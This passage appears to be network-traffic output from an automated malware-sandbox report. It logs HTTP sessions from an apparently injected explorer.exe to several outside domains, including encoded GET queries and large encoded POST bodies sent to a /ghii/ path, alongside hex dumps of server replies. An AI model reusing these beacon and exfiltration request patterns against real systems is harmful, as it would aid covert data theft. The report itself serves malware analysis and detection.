                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            24192.168.2.34972485.13.156.17780C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:08:11.567351103 CET302OUTGET /ghii/?9WI6t=QaRcz&Y5=s7qY3xXjkC1/TbWEYc6+5vkm1XLSScFCKWQ5egwgnE5ocsyGKPoCuhR72/pzoQfhJiIIuERBZ9Gt0DxnImXC1vT81iEZuqsQmQ== HTTP/1.1
                                                                                            Host: www.sem-jobs.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Feb 18, 2023 13:08:11.598798990 CET302INHTTP/1.1 404 Not Found
                                                                                            Date: Sat, 18 Feb 2023 12:08:11 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 196
                                                                                            Connection: close
                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            25192.168.2.34972523.227.38.7480C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:08:16.815486908 CET303OUTPOST /ghii/ HTTP/1.1
                                                                                            Host: www.yeah-go.com
                                                                                            Connection: close
                                                                                            Content-Length: 184
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.yeah-go.com
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.yeah-go.com/ghii/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 59 35 3d 57 50 4e 76 45 53 39 59 61 73 45 4d 39 68 4a 59 64 39 77 41 68 48 28 69 45 54 68 47 54 36 77 59 76 6c 36 30 6f 47 32 35 66 48 64 56 30 4e 41 63 56 5a 4d 47 76 48 4d 53 69 6e 37 70 62 4f 6d 72 46 53 4b 74 51 69 34 49 56 61 74 6b 30 49 4c 58 73 7a 55 7a 67 52 59 76 53 58 4c 6e 77 69 74 4e 69 54 62 33 78 6c 58 72 79 43 4c 68 70 6a 4f 41 31 4c 69 6e 68 4a 6c 62 71 52 34 49 67 2d 72 31 75 4e 6a 63 54 61 65 54 6e 6d 7a 2d 66 73 7e 39 58 62 66 42 33 6f 69 52 52 32 4e 49 4d 76 51 55 4f 56 71 6a 65 49 62 4c 45 74 30 5f 73 61 45 59 28 67 29 2e 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: Y5=WPNvES9YasEM9hJYd9wAhH(iEThGT6wYvl60oG25fHdV0NAcVZMGvHMSin7pbOmrFSKtQi4IVatk0ILXszUzgRYvSXLnwitNiTb3xlXryCLhpjOA1LinhJlbqR4Ig-r1uNjcTaeTnmz-fs~9XbfB3oiRR2NIMvQUOVqjeIbLEt0_saEY(g).
                                                                                            Feb 18, 2023 13:08:17.005947113 CET305INHTTP/1.1 404 Not Found
                                                                                            Date: Sat, 18 Feb 2023 12:08:16 GMT
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            X-Sorting-Hat-PodId: -1
                                                                                            Vary: Accept-Encoding
                                                                                            Vary: Accept
                                                                                            X-Frame-Options: DENY
                                                                                            X-Shopify-Stage: production
                                                                                            Content-Security-Policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=2814e515-6f65-4621-9478-e961c02b1926
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-Download-Options: noopen
                                                                                            X-Permitted-Cross-Domain-Policies: none
                                                                                            X-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=2814e515-6f65-4621-9478-e961c02b1926
                                                                                            X-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1
                                                                                            Content-Encoding: gzip
                                                                                            X-Request-ID: 2814e515-6f65-4621-9478-e961c02b1926
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4zkLhpEYLddlpYshogExnBaIh7hOqT%2BLEYpkl1quYMf9UXlcyEUIBIA9XzEO0SK3zc2jZfOUCIUCfChCLyb0WpkEOLydtbHQYutH7VU8fOE2l%2BkQiPM%2Fv0Etq0xUCEQMbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL
                                                                                            Data Raw:
                                                                                            Data Ascii:
                                                                                            Feb 18, 2023 13:08:17.006006002 CET305INData Raw: 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 2d 54 69 6d 69 6e 67 3a 20 63
                                                                                            Data Ascii: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=172.999859Server: cloudflareCF-RAY: 79b6a5b11d4135e6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                            Feb 18, 2023 13:08:17.006046057 CET306INData Raw: 62 36 64 0d 0a 1f 8b 08 00 00 00 00 00 04 03 cd 5a 6b 73 db 36 16 fd 9e 5f 01 53 6d 62 b5 a2 f8 90 28 4a b2 a4 4c 62 3b 33 d9 69 a7 99 a6 dd 76 b6 ed ec 80 24 28 d1 a6 08 2e 49 59 56 b3 f9 ef 7b 00 90 14 29 5b a9 92 4d b7 3b 4e c6 24 08 5c dc f7
                                                                                            Data Ascii: b6dZks6_Smb(JLb;3iv$(.IYV{)[M;N$\8,~KYxdvD!-L| ~L|%\IFA4d9Xa/,7]#q2>RJ:B:FOYAY&?QehMk<y|QS
                                                                                            Feb 18, 2023 13:08:17.006123066 CET307INData Raw: 7f 94 db 9e 1a 87 5f e3 4b 99 1b 08 58 16 ff fa 03 50 3a c8 0c 9f 48 a6 91 15 3e 91 02 ec 56 64 34 41 7f 27 dc 5d 44 ab 60 30 27 8c e6 4c 8f 12 9d 6f 0a 62 e6 b5 e4 27 cd 15 b2 9d 34 b1 4e b6 32 30 84 df 6c f2 e9 00 b9 a0 54 cf e1 70 19 41 8d 89
                                                                                            Data Ascii: _KXP:H>Vd4A']D`0'Lob'4N20lTpAeUwkcdh)d;1ZMOI!#cR0$l!($O&s4$OUj83_vY/-+cc8!J)L&!!QcZi>L'
                                                                                            Feb 18, 2023 13:08:17.006160021 CET308INData Raw: 64 b0 5f c9 56 b5 4f 55 fe c1 ed e3 79 f5 8d 9c cd c9 33 7f c5 fc 5b c0 28 cd c6 e1 19 79 fa 74 4f 5c cc 02 04 de 9a d0 ad fb ac 8a b0 e2 08 57 6c 73 62 fc da 3f 2f af 7a ba bf 8a 8c fd 85 71 b1 4f 1b d5 82 26 27 fd 35 2d fc d5 79 c6 ba 8f 11 56
                                                                                            Data Ascii: d_VOUy3[(ytO\Wlsb?/zqO&'5-yV%>%gLPizA@F\W=P&&+HM_q_kYEk*~=L>A@}0OOd0sF)*NnUdGW[e#%m
                                                                                            Feb 18, 2023 13:08:17.006190062 CET308INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            26192.168.2.34972623.227.38.7480C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:08:19.364682913 CET314OUTPOST /ghii/ HTTP/1.1
                                                                                            Host: www.yeah-go.com
                                                                                            Connection: close
                                                                                            Content-Length: 5332
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.yeah-go.com
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.yeah-go.com/ghii/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 59 35 3d 57 50 4e 76 45 53 39 59 61 73 45 4d 38 42 35 59 66 61 4d 41 6b 6e 28 6c 49 7a 68 47 42 36 77 55 76 6c 47 30 6f 48 7a 6b 59 78 46 56 30 65 34 63 45 37 55 47 70 48 4d 53 6b 6e 37 58 55 75 6e 6f 46 54 75 4c 51 6a 4a 71 56 5a 42 6b 31 62 7a 58 38 6a 55 77 38 42 59 71 52 58 4c 6b 39 43 74 4e 69 54 6e 72 78 6e 28 37 79 47 50 68 70 57 61 41 31 4a 36 6b 7a 70 6c 65 69 78 34 49 67 2d 58 36 75 4e 69 70 54 61 58 49 6e 6e 50 2d 66 35 79 39 48 61 66 43 7a 34 69 57 62 57 4d 65 4d 5f 68 47 4c 47 36 73 59 4f 33 46 4c 4d 31 6e 6a 4a 41 57 71 53 28 30 77 6e 4f 5f 58 61 78 79 45 37 45 53 6c 6c 28 50 39 6f 6f 49 47 78 63 63 41 64 45 79 4c 48 62 43 6a 71 6c 49 32 77 31 56 36 68 6e 75 28 43 48 74 63 4c 79 73 51 4a 5a 6e 35 66 4f 69 55 55 53 6c 31 65 42 31 4d 78 65 2d 49 4a 4d 78 70 30 56 79 7a 33 67 51 30 64 65 76 6c 73 7e 4f 6f 54 6c 63 77 4a 57 7a 63 38 35 47 42 4b 78 4a 45 44 77 56 38 44 39 64 38 61 6e 48 68 45 64 6b 7a 5f 55 69 66 2d 4e 68 73 34 34 74 79 46 4d 64 36 61 66 72 73 36 4b 61 4b 50 69 55 4d 55 4d 51 46 41 48 69 71 44 56 5f 6d 6c 53 4e 6b 70 71 64 78 76 50 44 49 6b 4b 6a 6f 37 37 31 48 4f 63 4f 6a 77 76 5f 59 4a 75 38 4f 62 77 73 4a 48 54 4a 39 54 47 79 4c 73 56 6f 73 76 66 49 4a 4a 58 70 4c 44 47 79 45 7a 67 78 4d 6c 37 5a 55 67 55 7a 52 41 59 32 45 5a 4b 57 35 71 47 67 6e 5f 68 61 49 78 70 76 72 78 4c 77 74 45 57 36 6e 4e 6a 73 28 44 50 66 53 78 53 46 59 70 6b 32 35 6b 6b 6d 42 79 4e 49 4b 62 6d 66 28 5f 76 4c 50 39 6e 6e 5a 4c 6a 54 37 68 4b 7a 47 37 4a 49 42 62 41 76 68 67 32 6a 54 63 34 33 74 63 56 61 68 30 6b 64 7a 47 64 79 6b 50 55 6f 72 4c 4b 53 34 67 79 41 5a 4a 51 31 47 34 39 78 5a 59 53 64 48 48 68 33 4a 47 48 35 4b 77 68 63 6d 4c 44 71 49 43 76 6c 51 34 4d 45 79 51 67 39 47 48 6b 6e 6b 35 75 34 30 73 47 7a 41 75 34 35 39 72 43 76 46 44 63 42 69 35 34 49 43 6d 65 70 57 53 49 35 48 73 33 77 6b 59 46 53 28 76 50 6a 7a 34 4a 4a 30 42 78 53 45 39 51 2d 54 49 46 32 63 47 57 68 50 43 56 44 46 39 6b 34 67 35 79 42 57 75 41 36 4c 71 76 71 53 75 69 45 66 41 37 64 39 77 39 4f 4c 4e 36 6c 62 39 52 6d 77 36 6c 6f 42 51 57 53 61 49 57 48 56 4c 44 61 49 4e 70 47 38 66 42 59 77 79 39 70 64 70 54 4c 37 35 75 79 61 51 70 31 31 47 35 77 4c 39 78 6e 41 49 55 73 4b 41 5a 37 48 30 6d 6c 52 48 47 65 6e 72 58 59 6d 42 62 56 64 5f 46 64 78 31 31 75 71 32 48 31 72 6c 38 47 51 64 42 65 76 68 65 63 7e 69 7e 44 6f 4b 72 50 51 38 28 4f 57 4d 55 33 50 49 37 76 59 6a 36 75 78 45 58 78 54 6a 79 51 65 33 6d 39 6b 4c 56 6a 37 74 79 73 5a 5f 47 57 32 31 6a 54 58 5a 55 77 6e 33 79 6b 42 4f 66 4e 77 32 62 37 58 51 34 41 6f 77 58 42 78 49 45 46 71 72 69 74 6d 44 69 6a 4a 42 65 52 70 7a 56 4b 42 66 7e 65 34 39 4d 73 5a 6f 43 79 4a 4a 37 6c 57 4a 7e 55 50 74 44 4c 31 4e 50 75 69 36 68 30 38 62 7e 31 6e 36 4e 42 4d 59 7a 53 78 61 61 4b 66 32 43 33 62 31 28 6e 6e 64 44 64 41 4b 67 56 32 32 6c 64 71 67 61 48 61 77 6c 52 63 30 53 66 32 58 57 57 32 70 56 66 68 61 72 55 56 64 50 44 70 73 46 55 77 6f 4c 48 50 73 74 67 70 77 44 46 79 5a 50 56 32 42 28 6c 6d 56 41 4a 47 54 33 46 54 54 66 6e 50 72 4a 56 58 67 58 4a 30 6a 54 32 32 47 7a 79 71 78 65 4c 6d 6a 41 50 73 4f 42 61 28 47 55 47 54 51 4e 67 7e 59 55 6b 59 45 41 65 57 4c 49 41 63 35 67 34 66 5a 57 5a 6b 55 64 2d 6e 68 42 63 28 64 65 2d 28 6f 50 6e 35 70 52 77 45 6a 75 69 32 79 4e 52 62 57 59 31 70 54 66 6c 77 74 4a 68 4e 6d 77 4f 59 57 74 45 6f 6d 32 43 34 59 77 52 37 38 4d 34 32 65 52 35 46 42 64 49 41 33 4c 64 43 69 58 53 65 33 5a 79 59 58 57 7a 56 4f 6f 67 65 47 45 6a 55 34 73 44 33 35 7e 71 41 62 7a 59 53 4b 38 53 55 54 64 77 35 79 28 63 71 30 30 57 56 62 4e 58 42 6b 62 50 6d 52 4e 67 51 48 4c 52 33 6e 4d 6b 51 2d 4b 59 6b 38 55 39 31 54 33 77 78 4f 77 51 46 62 4c 6f 49 73 62 77 46 45 32 4f 75 32 69 45 59 51 6f 45 39 64 70 53 6e 32 58 54 4d 30 47 47 54 68 76 5a 6c 79 78 37 6f 69 58 67 63 4b 74 4b 28 65 4a 69 59 4b 36 76 38 7a 73 4b 61 31 73 4f 61 68 4a 34 5a 4f 72 6c 57 32 4b 57 53 34 7a 75 56 59 38 72 71 37 46 6c 66 4d 28 49 59 69 51 49 28 38 4a 67 63 65 44 6f 32 52 53 57 69 37 71 50 4e 49 74 31 7e 4c 4a 56 4a 59 4b 58 50 70 73 72 78 52 76 64 78 7a 7a 6b 28 4d 6c 4d 67 65 5a 44 71 61 28 49
                                                                                            Data Ascii: Y5=WPNvES9YasEM8B5YfaMAkn(lIzhGB6wUvlG0oHzkYxFV0e4cE7UGpHMSkn7XUunoFTuLQjJqVZBk1bzX8jUw8BYqRXLk9CtNiTnrxn(7yGPhpWaA1J6kzpleix4Ig-X6uNipTaXInnP-f5y9HafCz4iWbWMeM_hGLG6sYO3FLM1njJAWqS(0wnO_XaxyE7ESll(P9ooIGxccAdEyLHbCjqlI2w1V6hnu(CHtcLysQJZn5fOiUUSl1eB1Mxe-IJMxp0Vyz3gQ0devls~OoTlcwJWzc85GBKxJEDwV8D9d8anHhEdkz_Uif-Nhs44tyFMd6afrs6KaKPiUMUMQFAHiqDV_mlSNkpqdxvPDIkKjo771HOcOjwv_YJu8ObwsJHTJ9TGyLsVosvfIJJXpLDGyEzgxMl7ZUgUzRAY2EZKW5qGgn_haIxpvrxLwtEW6nNjs(DPfSxSFYpk25kkmByNIKbmf(_vLP9nnZLjT7hKzG7JIBbAvhg2jTc43tcVah0kdzGdykPUorLKS4gyAZJQ1G49xZYSdHHh3JGH5KwhcmLDqICvlQ4MEyQg9GHknk5u40sGzAu459rCvFDcBi54ICmepWSI5Hs3wkYFS(vPjz4JJ0BxSE9Q-TIF2cGWhPCVDF9k4g5yBWuA6LqvqSuiEfA7d9w9OLN6lb9Rmw6loBQWSaIWHVLDaINpG8fBYwy9pdpTL75uyaQp11G5wL9xnAIUsKAZ7H0mlRHGenrXYmBbVd_Fdx11uq2H1rl8GQdBevhec~i~DoKrPQ8(OWMU3PI7vYj6uxEXxTjyQe3m9kLVj7tysZ_GW21jTXZUwn3ykBOfNw2b7XQ4AowXBxIEFqritmDijJBeRpzVKBf~e49MsZoCyJJ7lWJ~UPtDL1NPui6h08b~1n6NBMYzSxaaKf2C3b1(nndDdAKgV22ldqgaHawlRc0Sf2XWW2pVfharUVdPDpsFUwoLHPstgpwDFyZPV2B(lmVAJGT3FTTfnPrJVXgXJ0jT22GzyqxeLmjAPsOBa(GUGTQNg~YUkYEAeWLIAc5g4fZWZkUd-nhBc(de-(oPn5pRwEjui2yNRbWY1pTflwtJhNmwOYWtEom2C4YwR78M42eR5FBdIA3LdCiXSe3ZyYXWzVOogeGEjU4sD35~qAbzYSK8SUTdw5y(cq00WVbNXBkbPmRNgQHLR3nMkQ-KYk8U91T3wxOwQFbLoIsbwFE2Ou2iEYQoE9dpSn2XTM0GGThvZlyx7oiXgcKtK(eJiYK6v8zsKa1sOahJ4ZOrlW2KWS4zuVY8rq7FlfM(IYiQI(8JgceDo2RSWi7qPNIt1~LJVJYKXPpsrxRvdxzzk(MlMgeZDqa(IguQeneiV5X3vmQIni5tXPthFHN1RV96vaWk11l~hZU4RU2PHZ_I2Q7rKbJBUWO5G3SAzMiZ6n2XNSW99x0M7N3f6oZxb7SW2nhwlRU6htBX04W71U2KhnUN_1H6-MsjpFxXwdTFDG2Vtxmz6GXF5ECSIOSMZJ5DmUqk5WEACQ0H21RvLuGFXI1kNvFC-B_vkqS71iPt6UI4FWIZZtj6MAFxBV89xR8oGMtd5aZ3UV6El1B1B~jWif3RKXOzCL9HjviEoxK(uUhPsfUoqiOrb4vWKRTPzSG9tfhGtTyam8BVr(iFhIGG3XJ2Ai-zROEtvqv4SjAH6uj(K0IzRJxMPlpiGNA6HmKBe~9oFnNH6xT1PM9~0BzbhIvhoMQZiFgbpvdUkuOPFI6HgBrx4DfBMNpRRK-GZbPm7iGLgvQvqIsZUMFObMMsaoQjyp6B8guxaCPvqxNBqmHhEtnMPJV5nAiZB8hyS~jIphHQbGTpBzwVQ7BYbf8LswAOrlkevLutbArkqFq(azTxDBUQhrLgkLObD5YU86Dz5F8OS7lKu8a7zKyffYEtwUHWMOQ12fbdGKjFyDdm9AHZt~Vzr9uGOF-mloqq59GePQ6tqi7UZZ4xGJJbN2cfs7hdl07aprIe5a2HCPsYMpG3AIpJSug8jqywSSnB0XDzmzlIQqd39z24JhEGzXyqv3CSSmBn2PMP1(cmYFZmrveDC1rUFO_QCRvwmkTz83SHhfSjYS4Gd7bdVEhxCk_FSkRyDm7Hqwt2m7KQ06XoxfAoFNGb4sv~BJm1jSiYl6p43l5imXU(gxZq1w9(J~VMWzqloLJTFfH39p67MUZ78j-V1eR7gJiDxbj4qDXo_~7CnndlrwCT8jmMV0A9TAQkctf4Ga6gaLs~d0hM_vDebwLDI2WZjhdDq6Ph9octDrQfn3ZWUVhYKrmTQYj7wt3Xpoo5z5B~w9HobvHAB7PZZPlJSeZt5~TpV4h8EY0Q2NGRN6JMdWUipALUN5UUIpvJQQs8ZPZRAevZF2kvNe12054ffD5M2kMkyqgdFy-kC1dkUHcYN8jSMxddoOkooyvSvHmBnc4wTufgJYnHuJpPSBgEQG1ukJ3beFsY4lMf-4AP5~Kk-iLynianPoR82F_sGZjB6TprrEhxTv2tw0LSzXdAtteSNm12HwgpHmf6YAQFNz4G_6sQJO4vn1ec5(kywSjX9G5R92xtFUykM~YmneTJcYc0od6LlKdQIxZDGNvnSvXMHf8knFVEgSqkgCpV9QiEgCNorWxJYrED7uE3gwsEDaBBRdedfAMLutQC1kgKKWWYGeg6ryb9KtVj4m2q5bu(sAP45r71gPTB6GSkGjIZVGysv(TQZxLwN0w8tr1jfwWOoBbckDelr2W9c~t~Pkh1v0peB3_b9smrEJIO_E9JHc6tDRCQRe9KCCEYZEO9CHJ(Z58XizF1D3O0GH_J-8uPSFH5tq2jdCQrjR8FfS7JNFer5ao(Q9A~-Cxmc~Z80B2TZWNWJwRrIfkSq6Cq4BT7CqqCXPeXG4H5RX9Q9gaEBIITkBN4AoJu0bcXN4gwEkffMHfwFiOWjB5oR2Fih56eDrUshxer4pJ7RemLM8Bd9GXwjIsb4jzhVTM4cNQyct_8TT18Oi3aq2a7DXWNXxXGbSV6cMvX0T06xEMPara1z7xX3zgbXgL2z7p(Rak3p86FxalTS(3JaSVXzyokEB0ZzZioHITyX89qqhVHhnJP9ShO5Oc8x09tOY8Ss8vSqW0MLpbA522zXSJmXztOawwaMESanyX2w7N(T~SatkDRhR2gFcHh_OG8jK-HkPXTdaD1ZfUQi55QUxcrqSgwlqyZAw4(Mxd9TaCEO4asLcpbZDwyefWkB9nD-7GXlyBQb50TdC13zqrdObtC6uGNMugXVIWOymmEH8dTXINpNlHMfBQP-7Ivj5YXQP60Gfeyf0cD2VIPwNHzGpNIAIfDgKq1Hl2CPK1pSqvHSV2bc(LHp26oaUikyam7lsU54Le4Z~2IfRlB3BNPEBXHOBYykCH42t5AKSMqLmSjG(Q(yVWDH(-XsGBRm8RefsKfUxQ1t(Gld1FfQC7aLUCBIEpGwMc0RjHMzZ43h5z1M(aJDzcvw4HsglGwqx0Do4khxGPLcODnXA05VsuunVY7I8gIwSl8-xrInsnbm8XnrsjrvSFsByxhNjv7jhXyGZmoNyR2vmaTaSUw-HXtApn2gF9E3m4t7OjIP50~D1gk10tm6uPqWFwDV8CJ-ImFsyZJ_KrnR3nnApoI3fWBhQW52CaF5Bwe3r4u3wsa6G40RBdL0r703G45yIW53~EMKduSKkI7V7xaeylEtNockJU5E6DTutaOHaVEdw4SMma3mYIeCnE9B4WFIMtGMQpVd5eCaaV44IezFtzlCF71V2xeOvfR2QTBTpSlDNY4_icYmu0kXRUC3KImzabbxs_NWIyCeQiPIrUtfMjzKS1k76b2pyuTDTig3KQ9oUiRcwM2TfgRTlqBoCH0Uw9lWhyiKxd3jITG0j1An0-dPu9Ce3kbBIr4BnRX1ok2SpUjYPk7X6kQz5DXgka4PLc3hO3YKrdMxgo2z79LwlqDxv2ZWS1bIxVRSM7kg3-hi1QOXHXXTfDTkt_elaVgI8Fvu5BjuSfdHKg9TWnY3XeOa24voQlGsQtDIbO(gZPCUij~3w2pFehIUVZ4PJm8_y8jUSr8VwkOJ83SO715
                                                                                            Feb 18, 2023 13:08:19.535083055 CET316INHTTP/1.1 404 Not Found
                                                                                            Date: Sat, 18 Feb 2023 12:08:19 GMT
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            X-Sorting-Hat-PodId: -1
                                                                                            Vary: Accept-Encoding
                                                                                            Vary: Accept
                                                                                            X-Frame-Options: DENY
                                                                                            X-Shopify-Stage: production
                                                                                            Content-Security-Policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=98edf26c-9e33-42fa-be87-0ecb38b917b3
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-Download-Options: noopen
                                                                                            X-Permitted-Cross-Domain-Policies: none
                                                                                            X-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=98edf26c-9e33-42fa-be87-0ecb38b917b3
                                                                                            X-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1
                                                                                            Content-Encoding: gzip
                                                                                            X-Request-ID: 98edf26c-9e33-42fa-be87-0ecb38b917b3
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0Np7B%2F8pr2yQVAKFJ%2FAA%2FiWHbjcmg5VD92wdHabrhOHQKLDvkFrAphAjOKuZN%2FUNwvCjRgvtqeQBVpccEiBCBFYyBz0sBNi7yMEd%2BkxXY96Q0iAK%2Btsw5AJSRQnEdJKoIQ%3D%3D"}],"group":"cf-nel","max_age":604800
                                                                                            Data Raw:
                                                                                            Data Ascii:
                                                                                            Feb 18, 2023 13:08:19.535146952 CET316INData Raw: 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 2d 54 69 6d
                                                                                            Data Ascii: NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=158.999920Server: cloudflareCF-RAY: 79b6a5c10ebe362c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                            Feb 18, 2023 13:08:19.535224915 CET317INData Raw: 62 36 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 cd 5a 7b 93 db b6 11 ff df 9f 02 47 39 f1 29 15 c5 87 44 51 d2 49 ca f8 1e 6e 3d d3 99 3e 9c c4 ed 24 99 0e 48 82 12 7d 14 c1 80 d0 e9 64 d7 df bd bb 00 49 91 ba 93 2d bb 76 d3 39 7b 8e 04 81 c5 be 77
                                                                                            Data Ascii: b68Z{G9)DQIn=>$H}dI-v9{w"]Ji$]~ aJbnd|SO$rng?,J_MsOCDO 2>T"K%A@lb4Z<!dfpEEPd"SJFhFnB^32E#)K&;kLyc
                                                                                            Feb 18, 2023 13:08:19.535285950 CET319INData Raw: e9 71 f0 6b f8 52 e6 06 02 2c e3 bf fe 00 28 1d 64 86 cf 24 d3 c8 0a 9f 49 01 ec 26 05 cd a0 bf 43 77 c7 68 45 06 0b c2 68 c1 cc 24 33 f9 46 12 bb a8 25 3f 69 2e ca 76 d2 c4 3a d9 aa c0 40 bf d9 14 d3 01 e4 82 52 3d 87 c3 65 04 35 26 96 55 a9 ae
                                                                                            Data Ascii: qkR,(d$I&CwhEh$3F%?i.v:@R=e5&UF:5p#<QIhHzcj-7?!$7'\C0$l!!~,$O&s4$Ouj83_nY+goc8!SjC=m2!5lx{&m-
                                                                                            Feb 18, 2023 13:08:19.535337925 CET319INData Raw: 5b d5 3e 55 f9 07 6e 1f cf ab 6f e4 6c 4e 9e 85 2b 16 de 02 8c d2 6c 1c 9e 91 6f bf dd 13 c7 59 00 81 b7 26 74 eb 3e ab 22 ac 39 82 2b b6 39 b1 7e e9 9f 97 57 3d dd 5f 30 63 3f b5 2e f6 69 a3 5a d0 e4 a4 bf a6 32 5c 9d 0b d6 7d 8c b0 26 bd de 95
                                                                                            Data Ascii: [>UnolN+loY&t>"9+9~W=_0c?.iZ2\}&4u}XD}TJ=_@89Qj5J{=R=s0+tTJqn8+zcL>$zkdnw>=aiKiKpVRlFFVh8'J#8>
                                                                                            Feb 18, 2023 13:08:19.535384893 CET319INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            27192.168.2.34972723.227.38.7480C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
